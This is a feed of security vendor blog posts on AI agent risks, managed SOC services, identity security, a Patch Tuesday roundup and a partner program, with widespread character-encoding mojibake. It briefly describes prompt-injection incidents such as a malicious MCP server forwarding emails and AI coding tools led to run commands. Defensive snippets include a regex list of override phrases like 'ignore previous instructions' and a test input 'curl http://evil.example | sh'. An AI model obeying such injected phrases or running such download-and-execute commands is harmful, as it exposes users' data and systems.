โŒ


Securing the Agentic Endpoint

17 February 2026 at 14:10

Traditional Security Is Blind to the Agentic Endpoint

Modern endpoints are no longer defined only by executables. Increasingly, endpoint behavior is shaped by non-binary software, such as code packages, browser extensions, IDE plugins, scripts, local servers (including MCP), containers and model artifacts. These components are typically installed directly by employees and developers without centralized oversight, and because they are not classic binaries, they often fall outside the visibility and control of traditional endpoint security tooling.

AI agents compound this problem. They are legitimate tools that operate with the user’s credentials and permissions, enabling them to read, write and move data, and to take privileged actions across systems. When compromised or misused, agents become the “ultimate insider.” They can autonomously discover, invoke and even install additional components at machine speed, accelerating risk across an already expanding, largely unmanaged software layer.

Weaponizing Trusted Automation

This is not a future concern. The recent viral emergence of OpenClaw serves as a cautionary tale for the agentic era. Developed by a single individual in just one week, it rapidly secured millions of downloads while gaining broad permissions across users' emails, filesystems and shells. Within days, researchers identified 135,000 exposed instances and more than 800 malicious skills in its marketplace, underscoring how a single unvetted agent can create an immediate, global attack surface.

OpenClaw is not an outlier. Recent research highlights how quickly this risk is materializing:

  • Vibe Coding Threats: An AI extension for VS Code was found leaking code from 1.5 million developers. The tool could read any open file and send its contents back to the extension’s developer, harvest files in bulk without user interaction, and track users with commercial analytics SDKs.
  • Malicious MCP Server: Koi documented the first malicious Model Context Protocol (MCP) server in the wild. When developers added a specific skill to tools like Claude Code or Cursor, it silently forwarded every email to the plugin creator. Whatโ€™s more, this capability was added later, after developers had already started using it.

Compounding this risk is the fact that autonomous agent actions are often difficult to trace or reconstruct, leaving Security Operations Centers (SOCs) without the visibility they need when an incident occurs.

A New Category of Protection

Achieving complete endpoint security in the face of the rapidly expanding risk of agentic AI calls for a new category of protection: Agentic Endpoint Security. That’s why we announced our intent to acquire Koi, a pioneer in this space. Koi is designed to eliminate blind spots across the AI-native ecosystem and help organizations govern agentic tools safely.

Its technology rests on three core pillars:

  1. See All AI Software โ€“ Gain complete visibility into the AI tools, agents and non-binary software running in your environment.
  2. Understand Risks โ€“ Continuously analyze and understand the intent and risk level of all software and AI agents.
  3. Control the AI Ecosystem โ€“ Enforce policy in real-time to remediate issues and block risky behaviors.

Securing the Agentic Enterprise

We are convinced that Agentic Endpoint Security will soon become a standard requirement for enterprise security. Upon closing the proposed acquisition, we intend to integrate Koiโ€™s capabilities across our platforms to help our customers secure the AI-native workspace.

The wave of AI agents approaching the enterprise cannot be held back. Instead, we must offer secure tools that enable companies to confidently embrace agentic innovation.

Forward-Looking Statements

This blog post contains forward-looking statements that involve risks, uncertainties, and assumptions, including, but not limited to, statements regarding the anticipated benefits and impact of the proposed acquisition of Koi on Palo Alto Networks, Koi and their customers. There are a significant number of factors that could cause actual results to differ materially from statements made in this blog post, including, but not limited to: the effect of the announcement of the proposed acquisition on the parties’ commercial relationships and workforce; the ability to satisfy the conditions to the closing of the acquisition, including the receipt of required regulatory approvals; the ability to consummate the proposed acquisition on a timely basis or at all; significant and/or unanticipated difficulties, liabilities or expenditures relating to the proposed transaction; risks related to disruption of management time from ongoing business operations due to the proposed acquisition and the ongoing integration of other recent acquisitions; our ability to effectively operate Koi’s operations and business following the closing, integrate Koi’s business and products into our products following the closing, and realize the anticipated synergies in the transaction in a timely manner or at all; changes in the fair value of our contingent consideration liability associated with acquisitions; developments and changes in general market, political, economic and business conditions; failure of our platformization product offerings; risks associated with managing our growth; risks associated with new product, subscription and support offerings; shifts in priorities or delays in the development or release of new product or subscription or other offerings or the failure to timely develop and achieve market acceptance of new products and subscriptions, as well as existing products, subscriptions and support offerings; failure of our product offerings or business strategies in general;
defects, errors, or vulnerabilities in our products, subscriptions or support offerings; our customersโ€™ purchasing decisions and the length of sales cycles; our ability to attract and retain new customers; developments and changes in general market, political, economic, and business conditions; our competition; our ability to acquire and integrate other companies, products, or technologies in a successful manner; our debt repayment obligations; and our share repurchase program, which may not be fully consummated or enhance shareholder value, and any share repurchases which could affect the price of our common stock.

Additional risks and uncertainties that could affect our financial results are included under the captions "Risk Factors" and "Management's Discussion and Analysis of Financial Condition and Results of Operations" in our Quarterly Report on Form 10-Q filed with the SEC on November 20, 2025, which is available on our website at investors.paloaltonetworks.com and on the SEC's website at www.sec.gov. Additional information will also be set forth in other filings that we make with the SEC from time to time. All forward-looking statements in this blog post are based on information available to us as of the date hereof, and we do not assume any obligation to update the forward-looking statements provided to reflect events that occur or circumstances that exist after the date on which they were made.


The post Securing the Agentic Endpoint appeared first on Palo Alto Networks Blog.

Introducing Unit 42 Managed XSIAM 2.0

17 February 2026 at 12:01

24/7 Managed SOC Built for Tomorrow's Threats

The window for defense has collapsed, and most SOCs werenโ€™t built for the speed of todayโ€™s attacks. According to the 2026 Unit 42ยฎ Global Incident Response Report, some end-to-end attacks now unfold in under an hour. Attacks that used to take days or weeks now happen in minutes.

Most traditional SOC models are trapped in a cycle of alert overload, fragmented tools and limited engineering capacity that slows investigations and delays response. Traditional SIEM and MDR models were designed to react to alerts, not to continuously improve detections, correlations and response against threats that move at machine speed. Over time, the gap between attacker speed and defender capability keeps widening, and that is exactly why we built Unit 42 Managed XSIAM 2.0 (MSIAM).

Today marks the availability of the next evolution of our managed SOC offering – one that reflects how modern security operations must run in today’s threat landscape. MSIAM 2.0 is built on Cortex XSIAM®, the Palo Alto Networks SOC transformation platform, and operated by Unit 42 analysts, threat hunters, responders and SOC engineers who handle the most complex incidents in the world. With this solution, Unit 42 provides organizations with a 24/7 managed SOC that delivers continuous detection, investigation and full-cycle remediation across the entire attack surface while improving operations over time.

We donโ€™t just manage alerts. Unit 42 continuously engineers detections, correlations and response playbooks within XSIAM, refining them as attacker behavior evolves. This ongoing engineering ensures defenses improve over time, driven by real-world incidents and frontline threat intelligence, not static rules that quickly fall behind.
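As a rough illustration of what engineering detections and correlations means in practice, the toy Python below flags a brute-force pattern (several failed logins shortly before a success). This is not XSIAM's rule language; the event shape and threshold are invented purely for the example.

```python
from collections import defaultdict

def correlate_brute_force(events, fail_threshold=3):
    """events: list of (user, outcome) tuples in time order,
    where outcome is 'fail' or 'success'. Returns users who
    logged in successfully after repeated failures."""
    fails = defaultdict(int)
    alerts = []
    for user, outcome in events:
        if outcome == "fail":
            fails[user] += 1
        elif outcome == "success":
            if fails[user] >= fail_threshold:
                alerts.append(user)
            fails[user] = 0  # reset the counter after a successful login
    return alerts

events = [("alice", "fail"), ("alice", "fail"), ("alice", "fail"),
          ("alice", "success"), ("bob", "success")]
print(correlate_brute_force(events))  # ['alice']
```

Real correlation rules layer in time windows, source IPs and asset context, but the core idea is the same: stateful logic over an event stream, tuned continuously as attacker behavior changes.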

Why Managed XSIAM 2.0 Is Different

Elite SOC on Day One

We want SOC teams up and running as fast as possible. Experts lead onboarding, data mapping and configuration, and then your managed SOC team takes responsibility for operating and optimizing XSIAM on a day-to-day basis. The result is a SOC that improves over time without adding operational burden.

Every Threat Exposed

Unit 42 goes beyond reactive monitoring with continuous, proactive threat hunting across the entire attack surface. When a new threat is found in the wild, we produce threat impact reports that show how those techniques apply to each customerโ€™s environment. We then translate those insights into custom detections and automated response actions, while also monitoring and investigating the correlation rules your team creates. Both the global threat intelligence and your unique use cases are backed by our 24/7 analysis, closing gaps quickly and strengthening defenses over time.

We also now support both native and third-party EDR telemetry, so organizations can benefit from Unit 42 expertise and Cortexยฎ AI-driven analytics, regardless of the security technologies they use today. This enables customers to receive the strongest possible managed defense now, while creating a natural, low-friction path toward deeper platform consolidation as their environment evolves.

Machine-Speed Response

When incidents escalate, we donโ€™t just hand you a ticket; we take ownership. Collaborating with your team, we establish pre-authorized workflows to execute immediate responses across your entire environment, from endpoints and firewalls to identity and cloud. We pair the platformโ€™s native speed with expert oversight. By validating threat context and business impact, every response action is precise and safe, giving you the confidence to unleash full-cycle remediation. This allows MSIAM 2.0 to move seamlessly from detection to resolution with both velocity and precision.

And we stand behind our solution with a Breach Response Guarantee. If a complex incident strikes, you have the world’s best responders in your corner with up to 250 hours of Unit 42 Incident Response included. This built-in coverage removes the administrative hurdles of crisis response, enabling our experts to immediately transition from monitoring to deep forensic investigation and complete eradication, so you can focus on recovery.

Proven in the Real World with the Green Bay Packers

Working with Unit 42 and the Cortex XSIAM platform, the Green Bay Packers modernized their security across a complex hybrid environment, demonstrating what Unit 42's managed services deliver in real-world operations. By consolidating telemetry and accelerating investigation and response, they reduced response times from hours to minutes, investigated 54% more alerts and saved over 120 hours of analyst time without adding headcount.

These outcomes reflect the key benefits of MSIAM: Unit 42 experts working to apply frontline intelligence as new attacker behavior emerges, translating it into reporting and tailored detections that improve response where it matters most. When a machine-speed platform is operated by experts handling real incidents every day, defenses continuously strengthen as threats evolve.

The Future of the SOC

Unit 42 MSIAM 2.0 helps your SOC operate as it should by combining AI-driven analytics and automation with expert-led operations and engineering. This combination provides teams with the confidence that their defenses are always on, always improving and ready when it matters most. Thatโ€™s the SOC that security leaders need today, and the one weโ€™re building for tomorrow.

MSIAM is now delivered through two service tiers, Pro and Premium. Organizations can start where they are and grow at their own pace. Pro provides AI-driven managed SOC operations with continuous detection, investigation and response. Premium extends into full-lifecycle SOC engineering, with designated experts and customized detections, automation and tailored response playbooks as your security maturity grows.

To learn more about Managed XSIAM 2.0, join us at Symphony 2026, the premier Palo Alto Networks virtual SOC event, where Unit 42 and Cortex® experts will share frontline threat intelligence from the new 2026 Unit 42 Incident Response Report alongside real-world SOC transformation insights from organizations operating at machine speed.

The post Introducing Unit 42 Managed XSIAM 2.0 appeared first on Palo Alto Networks Blog.

Securing Every Identity in the Age of AI

11 February 2026 at 16:00

The enterprise security landscape has reached an inflection point. As organizations accelerate adoption of cloud, automation and artificial intelligence, identity has become the primary attack surface of the modern enterprise. Not because defenses have weakened, but because identities have multiplied and now operate continuously at machine speed, often with elevated access.

When attackers succeed today, it almost always starts with identity. Identity is now the number one attack vector. Eighty-seven percent of organizations experienced at least two successful, identity-centric breaches in the past 12 months. These breaches can lead to outages, regulatory exposure, financial loss and reputational damage.

This reality is why today marks such a pivotal moment. CyberArk is officially joining Palo Alto Networks. This step reflects a shared conviction that identity security is no longer a supporting function. To stay ahead of modern attackers, organizations need best-in-class identity security that is deeply integrated into their broader security strategy.

The Reality of the Modern Identity Attack Surface

For years, identity security focused on a relatively small population of human users, administrators and periodic access reviews. That model no longer matches reality.

Todayโ€™s enterprises depend on vast numbers of machine identities, including workloads, services, APIs and increasingly, autonomous AI agents. Machine identities now outnumber human identities by more than 80 to 1, while 75 percent of organizations acknowledge that their human identities are governed by outdated, overly permissive privileged models.

Attackers have adapted. Rather than breaking in through vulnerabilities, they increasingly log in using stolen credentials or by exploiting excessive, poorly governed access. Identity-based attacks have become the dominant breach vector because identity sprawl and standing privilege create opportunities that are difficult to detect with traditional tools.

Yet many identity programs remain fragmented. Access management, privileged access and governance often operate in silos, with delayed visibility and manual processes. Risk accumulates silently between reviews, leaving security teams reacting after the fact.

This is the problem CyberArk was built to solve.

Why Identity Security Must Be Continuous

Securing identities in this environment requires a fundamentally different approach. Identity risk changes constantly as new identities are created, permissions shift and systems scale dynamically. Controls must operate continuously, not episodically.

This means three things:

First, organizations need real-time visibility into who or what has access to critical systems across human, machine and AI identities.

Second, privilege must be applied dynamically. Access should be granted only when needed and removed automatically when it is no longer required. Standing privilege should be the exception, not the norm.

Third, governance must evolve from periodic compliance exercises to continuous enforcement that adapts as environments change.
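To make the second point concrete, here is a minimal Python sketch (not CyberArk's implementation) of just-in-time, time-bound access: a grant is created on demand and expires automatically, so no standing privilege accumulates.

```python
import time

class JustInTimeAccess:
    """Illustrative time-bound privilege grants: access is issued on
    request with a TTL and expires automatically, so there is no
    standing privilege to steal or abuse later."""

    def __init__(self):
        self._grants = {}  # (identity, resource) -> expiry timestamp

    def grant(self, identity, resource, ttl_seconds):
        self._grants[(identity, resource)] = time.monotonic() + ttl_seconds

    def is_allowed(self, identity, resource):
        expiry = self._grants.get((identity, resource))
        if expiry is None:
            return False
        if time.monotonic() >= expiry:
            del self._grants[(identity, resource)]  # prune the expired grant
            return False
        return True

jit = JustInTimeAccess()
jit.grant("deploy-bot", "prod-db", ttl_seconds=0.05)
print(jit.is_allowed("deploy-bot", "prod-db"))  # True while the grant is live
time.sleep(0.1)
print(jit.is_allowed("deploy-bot", "prod-db"))  # False after expiry
```

Production systems would add approval workflows, audit logging and credential rotation on top, but the key design choice is the same: expiry is the default, and continued access must be re-justified.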

This is the identity security vision that has guided CyberArk for decades and why joining Palo Alto Networks is such a natural next step.

Elevating Identity to a Core Platform

As part of Palo Alto Networks, CyberArk elevates identity security to a core platform pillar.

CyberArkโ€™s Identity Security Platform is proven at enterprise scale and trusted to protect some of the worldโ€™s most critical environments. Our approach extends privileged access principles beyond a narrow set of administrators to every identity that matters.

By treating every identity as potentially privileged, organizations can dramatically reduce their attack surface. Excessive access is identified. Unnecessary privilege is removed. Attackers lose the ability to move laterally by using stolen credentials.

Elevating identity security to a platform level also enables tighter alignment with network security, cloud security and security operations. Identity becomes a powerful control plane that informs policy enforcement, detection and response across the enterprise, delivering a more complete and actionable view of risk.

Securing the AI-Driven Enterprise

This shift is especially critical as organizations deploy AI-driven systems and autonomous agents.

These systems often require persistent access to sensitive data and infrastructure, making them attractive targets for attackers and difficult to govern with legacy identity models. Most enterprises today lack effective identity security controls for machine and AI-driven systems, leaving these identities overprivileged and undergoverned.

Applying privileged access principles universally enables organizations to secure AI-driven environments without slowing innovation. Identity security becomes the trust layer that allows enterprises to scale AI responsibly, ensuring access is controlled, monitored and adjusted dynamically as systems evolve.

What This Means for Customers

For customers, elevating identity security to a core platform delivers tangible outcomes.

Organizations gain clearer insight into identity access and risk across human, machine and agentic identities. They gain stronger protection against credential-based attacks by limiting excessive privilege and reducing the paths that attackers rely on to move undetected. They also gain operational simplicity by replacing fragmented tools and manual governance with consistent, scalable controls.

Most importantly, customers gain confidence. Confidence to adopt cloud, automation and AI, knowing that identity risk is governed continuously. Confidence that security can keep pace with change rather than reacting after the fact.

Moving Forward

CyberArkโ€™s Identity Security solutions will continue to be available as a standalone platform. Customers can rely on the solutions they trust today while benefiting from an accelerated roadmap focused on resilience, simplicity and improved security outcomes.

At the same time, integration is underway to bring CyberArkโ€™s best-in-class identity security capabilities more deeply into the Palo Alto Networks security ecosystem. Our priority is to listen closely to customers, meet their immediate needs, and build the path forward together.

The AI era is redefining how enterprises operate and how attackers operate alongside them. Securing every identity, whether human, machine or AI agent, is no longer optional. It is foundational.

By bringing CyberArk into Palo Alto Networks, we are taking a decisive step toward redefining identity security for the modern enterprise and helping our customers stay secure as they innovate at speed.

The post Securing Every Identity in the Age of AI appeared first on Palo Alto Networks Blog.

Patch Tuesday, February 2026 Edition

10 February 2026 at 22:49

Microsoft today released updates to fix more than 50 security holes in its Windows operating systems and other software, including patches for a whopping six โ€œzero-dayโ€ vulnerabilities that attackers are already exploiting in the wild.

Zero-day #1 this month is CVE-2026-21510, a security feature bypass vulnerability in Windows Shell wherein a single click on a malicious link can quietly bypass Windows protections and run attacker-controlled content without warning or consent dialogs. CVE-2026-21510 affects all currently supported versions of Windows.

The zero-day flaw CVE-2026-21513 is a security bypass bug targeting MSHTML, the proprietary browser engine from Internet Explorer that still ships in Windows. CVE-2026-21514 is a related security feature bypass in Microsoft Word.

The zero-day CVE-2026-21533 allows local attackers to elevate their user privileges to โ€œSYSTEMโ€ level access in Windows Remote Desktop Services. CVE-2026-21519 is a zero-day elevation of privilege flaw in the Desktop Window Manager (DWM), a key component of Windows that organizes windows on a userโ€™s screen. Microsoft fixed a different zero-day in DWM just last month.

The sixth zero-day is CVE-2026-21525, a potentially disruptive denial-of-service vulnerability in the Windows Remote Access Connection Manager, the service responsible for maintaining VPN connections to corporate networks.

Chris Goettl at Ivanti reminds us Microsoft has issued several out-of-band security updates since Januaryโ€™s Patch Tuesday. On January 17, Microsoft pushed a fix that resolved a credential prompt failure when attempting remote desktop or remote application connections. On January 26, Microsoft patched a zero-day security feature bypass vulnerability (CVE-2026-21509) in Microsoft Office.

Kev Breen at Immersive notes that this monthโ€™s Patch Tuesday includes several fixes for remote code execution vulnerabilities affecting GitHub Copilot and multiple integrated development environments (IDEs), including VS Code, Visual Studio, and JetBrains products. The relevant CVEs are CVE-2026-21516, CVE-2026-21523, and CVE-2026-21256.

Breen said the AI vulnerabilities Microsoft patched this month stem from a command injection flaw that can be triggered through prompt injection, or tricking the AI agent into doing something it shouldnโ€™t โ€” like executing malicious code or commands.

โ€œDevelopers are high-value targets for threat actors, as they often have access to sensitive data such as API keys and secrets that function as keys to critical infrastructure, including privileged AWS or Azure API keys,โ€ Breen said. โ€œWhen organizations enable developers and automation pipelines to use LLMs and agentic AI, a malicious prompt can have significant impact. This does not mean organizations should stop using AI. It does mean developers should understand the risks, teams should clearly identify which systems and workflows have access to AI agents, and least-privilege principles should be applied to limit the blast radius if developer secrets are compromised.โ€
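Breen's least-privilege advice can be sketched in code. The hypothetical guardrail below only lets an agent run a shell command whose executable is on an explicit allowlist, and it rejects command-chaining metacharacters; the allowlist and function names are illustrative, not taken from any real product.

```python
import shlex

# Hypothetical guardrail: an agent's proposed shell command runs only if
# its executable is explicitly allowlisted, limiting the blast radius of
# prompt-injected instructions.
ALLOWED_COMMANDS = {"git", "ls", "cat", "pytest"}

def is_command_allowed(command_line: str) -> bool:
    try:
        tokens = shlex.split(command_line)
    except ValueError:
        return False  # malformed quoting: reject outright
    if not tokens:
        return False
    # Reject metacharacters that could chain extra commands or spawn subshells.
    if any(ch in command_line for ch in (";", "|", "&", "`", "$(")):
        return False
    return tokens[0] in ALLOWED_COMMANDS

print(is_command_allowed("git status"))                     # True
print(is_command_allowed("curl http://evil.example | sh"))  # False
```

An allowlist inverts the usual blocklist logic: anything not explicitly trusted is denied, which is exactly the least-privilege posture Breen recommends for agent-accessible systems.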

The SANS Internet Storm Center has a clickable breakdown of each individual fix this month from Microsoft, indexed by severity and CVSS score. Enterprise Windows admins involved in testing patches before rolling them out should keep an eye on askwoody.com, which often has the skinny on wonky updates. Please don’t neglect to back up your data if it has been a while since you’ve done that, and feel free to sound off in the comments if you experience problems installing any of these fixes.

From Solo to Squad: The Evolution of Cyber Security Training in the AI Era

By: anap
9 February 2026 at 13:00

Generative AI is transforming cyber defense. Technical expertise remains critical, but AI-driven threats demand more than individual skill – they require the collective intelligence of the organization’s SOC. To understand how businesses are adapting, Infinity Global Services analyzed training consumption trends from 2023 to 2025. The findings reveal a decisive shift from individual courses to team-based subscriptions, signaling a new approach to workforce development in the age of AI.

The Data: A Shift in Mindset

Infinity Global Services’ training data shows a clear change in procurement strategies. Individual course purchases have declined by 33%, while team-based subscription models have surged, […]

The post From Solo to Squad: The Evolution of Cyber Security Training in the AI Era appeared first on Check Point Blog.

The Power of Glean and Prisma AIRS Integration

Accelerating Secure AI Adoption

The rapid adoption of AI is transforming the enterprise, unlocking unprecedented productivity and accelerating workflows at a record pace. However, this velocity creates a new productivity paradox: The faster AI moves, the more it can expose the organization to entirely new categories of risk. Without specialized guardrails, unchecked AI can inadvertently bypass company policies, violate legal standards, or ignore ethical norms.

To bridge this gap, Glean, the Work AI platform, and Palo Alto Networks Prismaยฎ AIRSโ„ข have integrated to provide an essential security layer that empowers organizations to adopt generative AI with confidence, helping ensure that massive productivity gains never come at the cost of trust, security or compliance.

Glean and Prisma AIRS stop AI attacks at runtime.
Prompt injection threat blocked in real time.

Real-Time Defense Against the Modern AI Threat Surface

Generic filters often fail to catch the sophisticated nuances of AI-driven attacks. The integration of Glean and Prisma AIRS provides a purpose-built defense that acts in real time across three critical areas:

1. Neutralizing Prompt Injection

Prompt injections are malicious instructions designed to trick AI models into ignoring their safety protocols, potentially leading to the exposure of sensitive data or the execution of unauthorized actions.

For instance, an attacker could craft a prompt that causes the AI to leak its own system instructions, leading to data loss. Glean and Prisma AIRS instantly detect these sophisticated manipulation attempts, blocking the request and notifying the user before the organization’s integrity is compromised.
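As a deliberately naive illustration of pre-model screening (real products such as Prisma AIRS use far richer analysis than keyword patterns, which attackers can trivially rephrase around), a filter might reject prompts matching known injection phrasings:

```python
import re

# Toy injection phrasings for illustration only; a real detector would use
# semantic and behavioral analysis, not a static pattern list.
INJECTION_PATTERNS = [
    r"ignore (all )?(previous|prior) instructions",
    r"reveal (your )?system prompt",
    r"disregard (your )?safety",
]

def screen_prompt(prompt: str) -> bool:
    """Return True if the prompt looks safe, False if it should be blocked."""
    lowered = prompt.lower()
    return not any(re.search(p, lowered) for p in INJECTION_PATTERNS)

print(screen_prompt("Summarize Q3 revenue by region"))        # True
print(screen_prompt("Please IGNORE ALL PRIOR INSTRUCTIONS"))  # False
```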

2. Safeguarding Against Harmful and Toxic Content

AI interactions must remain professional, ethical and safe.

By scanning both user prompts and AI-generated responses against organizational policy, Glean and Prisma AIRS automatically block requests that contain toxic, biased, or otherwise harmful content. This enables AI to remain a positive and productive asset for the entire workforce.

3. Preventing Malicious Code and Unsafe URLs

AI models can sometimes generate unsafe code snippets, get data from a poisoned source, or provide harmful links that lead to phishing sites or malware downloads.

For example, a developer might ask an AI assistant for a code library to process data, and the model could inadvertently suggest a malicious package that compromises the application. The Glean and Palo Alto Networks integration provides a crucial safety net, inspecting all generated content for malicious patterns and preventing employees from interacting with risky URLs, keeping the entire AI-driven development and research lifecycle secure.
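One simple way to sketch this kind of safety net is to vet every URL in model output against an allowlist of trusted hosts before showing it to the user. This is purely illustrative: the host list below is invented, and real inspection goes much deeper (reputation feeds, sandbox detonation, package provenance).

```python
from urllib.parse import urlparse

# Example-only allowlist; real policy would come from threat intelligence.
TRUSTED_HOSTS = {"docs.python.org", "pypi.org", "github.com"}

def extract_and_vet_urls(model_output: str) -> list[str]:
    """Return only the URLs in the output whose host is trusted."""
    vetted = []
    for token in model_output.split():
        if token.startswith(("http://", "https://")):
            host = urlparse(token).hostname or ""
            if host in TRUSTED_HOSTS:
                vetted.append(token)  # keep links to known-good hosts only
    return vetted

output = "See https://pypi.org/project/requests/ or http://free-sdk.example/download"
print(extract_and_vet_urls(output))  # ['https://pypi.org/project/requests/']
```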

Secure AI in Minutes with Out-of-the-Box Integration

The true power of the Glean and Palo Alto Networks partnership lies in its simplicity. We’ve removed the friction of complex security configurations, enabling organizations to realize value immediately through a seamless, out-of-the-box integration.

Onboarding is completed in three simple steps within the Glean admin console:

  1. Navigate to AI Security and select Palo Alto Networks AI Runtime Securityโ„ข.
  2. Paste your Prisma AIRS Runtime Security API Key.
  3. Click Save.
Activate Prisma AIRS from the Glean admin console.

With these three steps, the integration is live, providing an invisible but invincible layer of defense across your AI chats and agent interactions.

Glean admin panel showcasing all findings.

Partnering for a Secure AI Future

As enterprises scale their AI initiatives, specialized security becomes non-negotiable. Prisma AIRS provides the advanced, granular protection needed to catch threats that generic tooling often misses, and its integration with Glean delivers that protection exactly where work happens.

Drive productivity, foster innovation, and secure your future with Glean and Palo Alto Networks.

Key Takeaways

  • Real-Time Threat Mitigation: Instantly block prompt injections, toxic content, and malicious code, transforming AI from a risk factor into a secure asset.
  • Frictionless Deployment: Achieve comprehensive AI security in minutes with a simple, three-click API integration within the Glean console.
  • Time to Value: Scale AI adoption across the enterprise by ensuring every interaction complies with internal policies and global safety standards.

Ready to Deploy Secure AI? To explore how this integration can protect your organization, sign up for the Glean and Palo Alto Networks upcoming webinar.

The post The Power of Glean and Prisma AIRS Integration appeared first on Palo Alto Networks Blog.

New Year, New Program, New Opportunities

5 February 2026 at 00:30

Our Reimagined Partner Program Is Here

The cybersecurity landscape continues to evolve at an extraordinary pace. AI-driven threats are expanding the attack surface, demanding faster, more precise responses and greater resilience. At the same time, customers want fewer vendors, deeper integrations and trusted advisers who can help them achieve positive, measurable outcomes and reduce unnecessary complexity.

Meeting these challenges and expectations requires a potent combination of world-class technology and world-class partnership. Thatโ€™s why, in 2026, Palo Alto Networks is evolving our partner program and unifying it with our value exchange framework.

We are excited to share that we have rolled out new program features. The changes we’re introducing are designed to strengthen how we work with our ecosystem across every partner motion – from resale and co-sell to delivery, support and managed services. The goal of this evolution is simple: Create clearer, more scalable paths for growth and mutual success.

Why Weโ€™re Evolving to Meet the Demands of a Changing Market

The same forces transforming the cybersecurity landscape are also changing what it means to be a successful partner. As customers reduce their reliance on disparate point solutions, choose to consolidate platforms and lean harder on AI-driven automation, theyโ€™re turning to partners for much more than technology procurement. They want design guidance, integration expertise and ongoing, outcome-focused support.

Our partners are also clear about what they need from us. Theyโ€™ve asked Palo Alto Networks for a partner program that is simpler to engage with, more predictable in how it rewards impact, and more closely aligned with how they build and deliver value across resale, services and managed offerings. Our partners also seek less complexity and more room to differentiate through their own investments and innovation.

The evolution of our partner program is our response not only to feedback from our partners but also to extensive market research. It will bring greater structure where our partners seek consistency, greater flexibility in how and where they innovate, as well as greater transparency in how the value they deliver is recognized. These strategic changes will help ensure our mutual customers benefit the most when they work with our vast and diverse ecosystem in todayโ€™s platform-first, outcome-driven marketplace.

A Unified Growth Model = Partner Program + Value Exchange

Palo Alto Networks NextWave Partner Program and value exchange framework were designed to work together, not as separate tracks, but as one powerful engine for driving growth. This unified framework makes it easier for partners to engage with us and get the most from the partner program. It rewards impact, expertise and customer success rather than focusing narrowly on transactions.

This evolved model is built on the foundation of three guiding principles:

  • Predictability – Consistent expectations and program structures that support long-term planning.
  • Repeatability – Enablement and tools that help partners scale practices with confidence.
  • Profitability – Incentives, rebates and routes to growth tied directly to customer value.

The new framework can help partners build sustainable businesses while accelerating the adoption of platformized AI-powered security. Letโ€™s take a look at the many benefits our partner ecosystem may experience through this reimagined program.

What Our Partners Can Expect

Our redesigned partner program enables greater alignment between the investments you make and the outcomes you achieve. Across Palo Alto Networks NextWave Partner Program, weโ€™re strengthening how partners can scale, differentiate and grow their business with improvements in three key areas.

1. Access That Accelerates Scale

Weโ€™re expanding access to the tools and resources that can help partners reach customers faster and deliver solutions with confidence:

  • Broader on-demand learning and persona-based enablement.
  • Labs and demos that make it easier to showcase platform value.
  • Improved quoting tools and API-driven automation that can ease operational friction.
  • Enhanced support resources that improve quality delivery and the customer experience.

These and other capabilities can help reduce complexity and accelerate your ability to propose, design and deploy high-quality, platform-based solutions for customers.

2. Commitment That Reflects Intentional Investment

As the cybersecurity market evolves, so does the definition of partnership. Our newly evolved program introduces clearer expectations and meaningful rewards for partners who invest in specialization and growth. Weโ€™re raising the bar on the programโ€™s standards:

  • Higher bookings and growth targets.
  • Increased specialization depth across key areas.
  • New targeted rebates aligned to value creation.
  • A strengthened global distribution strategy to support scale.

These enhancements will recognize partners who lean into the platform approach and drive meaningful impact for customers.

3. Profitability That Helps Fuel Long-Term Growth

A top priority for our updated program is helping partners build predictable, repeatable and profitable business practices in 2026 and beyond. Here are some of the measures weโ€™re introducing:

  • Default service quoting (Authorized Support Center and Authorized Professional Services) to help strengthen delivery economics.
  • Incentive model that drives higher partner profitability on AI-enabled security solutions.
  • Programmatic discounts and improved quoting tools to speed sales cycles.
  • A new Partner Development Fund (PDF) to help partners build capabilities and pipeline.

Our aim is to create a more consistent, performance-driven model that supports partner strategy today and creates room for expansion tomorrow.

What These Changes Mean for Customers

A more connected and enabled partner ecosystem doesnโ€™t just benefit our partners. It elevates the entire customer experience.

Customers can expect smoother, simplified engagement with trusted cybersecurity advisers who speak the same language and share the same goals. And with greater consistency across sales, delivery and ongoing support, organizations won't be saddled with complexity that slows transformation and makes it harder to adopt, build and deploy AI boldly yet safely.

Customers can also move forward with greater confidence in expanding their use of our Palo Alto Networks integrated, AI-driven cybersecurity platform, knowing their partners are equipped with the training, tools and know-how to help guide them every step of the way.

Driving Shared Success Through the Value Exchange

The value exchange in cybersecurity reinforces a principle that has long guided Palo Alto Networks' approach to partnering: Growth follows value creation. It's the foundation for how we work with our ecosystem, strengthening connections among partners, customers and our platform.

This is the power of a global ecosystem moving with purpose. When platform innovation, partner expertise and customer needs are aligned, everything moves faster and desired outcomes are more readily achieved. Deployments accelerate, architectures are simplified, and enterprises gain the resilient security postures needed to withstand the pressures of an AI-driven threat landscape.

Whatโ€™s Next

We encourage you to review a set of short videos in The Learning Center for Partners, which provide more details about the planned changes to Palo Alto Networks NextWave Partner Program.

We believe the year ahead offers one of the most significant opportunities for innovation and growth our ecosystem has ever seen. By reimagining our partner program and value exchange framework, Palo Alto Networks is doubling down on the promise of our shared success, mutual growth and long-term value.

To our partners, thank you, as always, for your commitment, collaboration and belief in what weโ€™re creating together. Whatโ€™s ahead is more than an evolution of a long-standing and successful partner program. Itโ€™s a new era of partnering with precision to build the future of cybersecurity.


Key Takeaways

  • A reimagined partner program accelerates sustainable growth. Beginning in early February, a single, scalable framework will guide every partner motion and reward meaningful impact.
  • Partners have more ways to scale and differentiate. Expanded enablement, automation and incentives can help build stronger, more profitable practices.
  • Customers will benefit from more consistent experiences. A more aligned ecosystem enables simpler engagement, smoother delivery and increased confidence in the platform.

Forward-Looking Statements

This blog contains forward-looking statements that involve risks, uncertainties and assumptions, including, without limitation, statements regarding the benefits, impact, or performance or potential benefits, impact or performance of our products and technologies or future products and technologies. These forward-looking statements are not guarantees of future performance, and there are a significant number of factors that could cause actual results to differ materially from statements made in this blog. We identify certain important risks and uncertainties that could affect our results and performance in our most recent Annual Report on Form 10-K, our most recent Quarterly Report on Form 10-Q, and our other filings with the U.S. Securities and Exchange Commission from time-to-time, each of which are available on our website at investors.paloaltonetworks.com and on the SEC's website at www.sec.gov. All forward-looking statements in this blog are based on information available to us as of the date hereof, and we do not assume any obligation to update the forward-looking statements provided to reflect events that occur or circumstances that exist after the date on which they were made.

The post New Year, New Program, New Opportunities appeared first on Palo Alto Networks Blog.

How does cyberthreat attribution help in practice?

2 February 2026 at 18:36

